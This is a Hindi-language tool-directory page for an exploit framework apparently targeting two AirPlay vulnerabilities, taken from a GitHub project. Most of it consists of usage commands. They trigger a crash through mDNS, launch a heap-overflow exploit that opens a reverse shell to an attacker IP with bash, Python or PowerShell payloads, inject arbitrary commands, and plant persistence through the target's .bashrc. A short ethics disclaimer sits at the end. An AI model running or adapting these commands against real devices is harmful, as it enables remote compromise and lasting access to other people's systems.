Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
AirBorne-PoC — poc for CVE-2025-24252 & CVE-2025-24132 | Kitploit
उपकरण/GitHubGitHub/ekomssavior/airborne-poc
Persistence MechanismsVulnerability AnalysisExploitationShellcodePost-ExploitationCommand and ControlRemote Access ToolPayload DevelopmentBinary Exploitation
GitHubekomssavior/airborne-poc

AirBorne-PoC

poc for CVE-2025-24252 & CVE-2025-24132

164277 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

AirBorne PoC फ्रेमवर्क – Elite RCE संस्करण

CVE-2025-24252 और CVE-2025-24132 के लिए पूर्ण PoC फ्रेमवर्क
द्वारा ekomsSavior |

AirBorne एक संयुक्त proof-of-concept (PoC) फ्रेमवर्क है जो Apple की AirPlay सेवा में दो गंभीर कमजोरियों को लक्षित करता है। इसमें एक पूर्ण क्रैश ट्रिगर और एक कार्यशील रिवर्स शेल एक्सप्लॉइट शामिल है जिसमें वैकल्पिक पर्सिस्टेंस, लिसनर और कई पेलोड फॉर्मेट — सभी एक ही स्क्रिप्ट में हैं।

मूल संस्करण खोज रहे हैं?
लीगेसी संस्करण अभी भी इस रिपॉजिटरी की legacy ब्रांच में उपलब्ध है।
इसे देखने के लिए:

root@kitploit:~
git checkout legacy

कवर किए गए CVE

CVE-2025-24252 – mDNS TXT रिकॉर्ड क्रैश

  • एक दोषपूर्ण mDNS पैकेट के माध्यम से AirPlayReceiver डेमॉन में क्रैश ट्रिगर करता है
  • पोर्ट 5353 पर UDP ब्रॉडकास्ट पर काम करता है

CVE-2025-24132 – हीप ओवरफ्लो → रिवर्स शेल (RCE)

  • पोर्ट 7000 पर AirPlay की TCP सेवा में हीप ओवरफ्लो ट्रिगर करता है
  • bash, python और PowerShell रिवर्स शेल पेलोड का समर्थन करता है
  • .bashrc इंजेक्शन (Linux) का उपयोग करके वैकल्पिक पर्सिस्टेंस शामिल है

शुरू करना

1. रिपॉजिटरी क्लोन करें

root@kitploit:~
git clone https://github.com/ekomsSavior/AirBorne-PoC.git
cd AirBorne-PoC

2. निर्भरताएँ स्थापित करें

root@kitploit:~
sudo apt update
sudo apt install -y python3-scapy netcat

रनटाइम वॉकथ्रू

एकल स्क्रिप्ट airborne.py में दोनों PoC और सभी तर्क शामिल हैं:

  • --exploit का उपयोग करके एक CVE चुनें
  • --payload का उपयोग करके एक रिवर्स शेल पेलोड सेट करें
  • आपके लिए स्वचालित रूप से netcat लिसनर शुरू करता है
  • वैकल्पिक रूप से --persistent का उपयोग करके लक्ष्य पर पर्सिस्टेंस सक्षम करता है

उपयोग उदाहरण

mDNS पैकेट के साथ लक्ष्य को क्रैश करें (CVE-2025-24252)

root@kitploit:~
sudo python3 airborne.py --exploit 24252 --interface wlan0

मॉनिटर मोड में एक इंटरफ़ेस की आवश्यकता है।


हीप ओवरफ्लो → RCE लॉन्च करें (CVE-2025-24132)

डिफ़ॉल्ट bash शेल के साथ पूर्ण एक्सप्लॉइट शुरू करें:

root@kitploit:~
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99

इसके बजाय Python शेल चुनें:

root@kitploit:~
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --payload python

Linux लक्ष्यों पर वास्तविक पर्सिस्टेंस सक्षम करें:

root@kitploit:~
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --persistent

केवल शेल कमांड इंजेक्शन

root@kitploit:~
sudo python3 airborne_bash_command_injector.py --exploit 24132 --target 192.168.1.42 --command "command"

पेलोड विकल्प

Payloadविवरण
bashTCP पर डिफ़ॉल्ट bash रिवर्स शेल
pythonsocket और pty का उपयोग कर Python-आधारित रिवर्स शेल
powershell

पर्सिस्टेंस मोड

--persistent का उपयोग करते समय, स्क्रिप्ट लक्ष्य के निम्नलिखित में एन्कोडेड रिवर्स शेल पेलोड जोड़ देगी:

root@kitploit:~
~/.bashrc

यह सुनिश्चित करता है कि जब भी उपयोगकर्ता लॉग इन करता है या टर्मिनल खोला जाता है, तो आपको एक शेल प्राप्त होता है।


रखरखाव नोट्स

  • रिवर्स शेल को base64 का उपयोग करके एन्कोड किया जाता है और बफर ओवरफ्लो के बाद वितरित किया जाता है
  • सभी पेलोड पोर्ट 7000 के माध्यम से भेजे जाते हैं
  • mDNS पैकेट UDP 5353 पर जाते हैं और रॉ सॉकेट अनुमति की आवश्यकता होती है
  • सुनिश्चित करें कि आपका अटैक बॉक्स IP लक्ष्य डिवाइस द्वारा पहुँचा जा सके
  • स्क्रिप्ट बुनियादी त्रुटियों को संभालती है और बंद पोर्ट पर चुपचाप विफल हो जाती है

नैतिक अस्वीकरण

यह प्रोजेक्ट केवल शैक्षिक, नैतिक और अधिकृत अनुसंधान के लिए है।

  • आपके पास लक्ष्य प्रणाली का परीक्षण करने के लिए स्पष्ट अनुमति होनी चाहिए।
  • आप किए गए किसी भी कार्रवाई के लिए पूरी जिम्मेदारी लेते हैं।

सिस्टम का अनधिकृत शोषण अवैध और अनैतिक है।


क्रेडिट

  • ekomsSavior द्वारा निर्मित
  • वास्तविक दुनिया के CVE और एक्सप्लॉइट विकास अनुसंधान से प्रेरित
टूल डाउनलोड करें
पूर्ण Windows PowerShell RCE पेलोड (अस्पष्टित)